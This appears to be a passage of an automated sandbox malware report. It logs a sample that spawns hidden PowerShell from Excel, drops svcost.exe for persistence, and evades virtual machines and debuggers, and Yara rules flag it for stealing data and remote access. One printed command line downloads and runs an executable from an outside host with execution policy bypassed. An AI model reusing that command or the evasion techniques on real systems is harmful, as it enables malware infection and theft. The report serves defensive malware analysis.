Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: tmp7752.exe, 00000005.00000002.489076925.0000000002882000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Memory allocated: 200000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Memory allocated: 2820000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Memory allocated: 450000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Memory allocated: 5450000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Memory allocated: 17450000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Memory allocated: 250000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Memory allocated: 2490000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Memory allocated: 250000 memory reserve | memory write watch			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2067			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3692	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3696	Thread sleep time: -1844674407370954s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe TID: 3776	Thread sleep time: -1844674407370954s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe TID: 3780	Thread sleep count: 113 > 30			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe TID: 3780	Thread sleep count: 163 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 3948	Thread sleep time: -1844674407370954s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 3956	Thread sleep count: 165 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 3964	Thread sleep count: 130 > 30			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\			Jump to behavior

Source: svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft|VMWare|Virtual

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe

Code function: 5_2_0020ECA8 LdrInitializeThunk,

5_2_0020ECA8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp7752.exe "C:\Users\user\AppData\Local\Temp\tmp7752.exe"			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe"			Jump to behavior

Language, Device and Operating System Detection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp7752.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svcost.exe VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Source: Yara match	File source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTR

Source: Yara match	File source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTR

Remote Access Functionality

Source: Yara match	File source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTR